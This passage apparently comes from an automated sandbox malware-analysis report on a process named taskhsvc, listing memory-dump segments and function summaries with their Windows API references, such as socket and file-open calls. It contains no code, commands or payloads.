    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00237E5D, Relevance: 3.1, APIs: 2, Instructions: 70
    APIs
    • time.MSVCRT ref: 00237E82
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 002C1E90: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00238007), ref: 002C1EC8
      • Part of subcall function 002B3FD0: __stack_chk_fail.LIBSSP-0 ref: 002B4030
      • Part of subcall function 00237F52: __stack_chk_fail.LIBSSP-0 ref: 00237FD2
    • __stack_chk_fail.LIBSSP-0 ref: 00237F4B
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00316FAD, Relevance: 3.1, APIs: 2, Instructions: 67
    APIs
      • Part of subcall function 0031721B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00316FE0), ref: 0031724B
    • socket.WS2_32 ref: 0031701F
    • __stack_chk_fail.LIBSSP-0 ref: 00317080
      • Part of subcall function 003172A4: ioctlsocket.WS2_32 ref: 003172DB
      • Part of subcall function 003172A4: __stack_chk_fail.LIBSSP-0 ref: 003172F0
      • Part of subcall function 00316D57: __stack_chk_fail.LIBSSP-0 ref: 00316DE2
      • Part of subcall function 00316CDC: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00316E12), ref: 00316D20
      • Part of subcall function 00316D27: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00316E8C), ref: 00316D50
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0031928D, Relevance: 3.0, APIs: 2, Instructions: 50
    APIs
    • FormatMessageA.KERNELBASE ref: 003192E4
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
    • __stack_chk_fail.LIBSSP-0 ref: 0031933D
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003159C4, Relevance: 3.0, APIs: 2, Instructions: 44
    APIs
    • _open.MSVCRT ref: 00315A44
    • __stack_chk_fail.LIBSSP-0 ref: 00315A5A
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003211F6, Relevance: 3.0, APIs: 2, Instructions: 38
    APIs
      • Part of subcall function 00321197: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00321389), ref: 003211EF
    • abort.MSVCRT ref: 0032125C
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00319B54), ref: 0032127B
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001CDAA5, Relevance: 3.0, APIs: 2, Instructions: 32
    APIs
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    • time.MSVCRT ref: 001CDAE9
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CDBD6), ref: 001CDB17
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00321144, Relevance: 3.0, APIs: 2, Instructions: 25
    APIs
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • memset.MSVCRT ref: 0032117D
    • __stack_chk_fail.LIBSSP-0 ref: 00321190
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
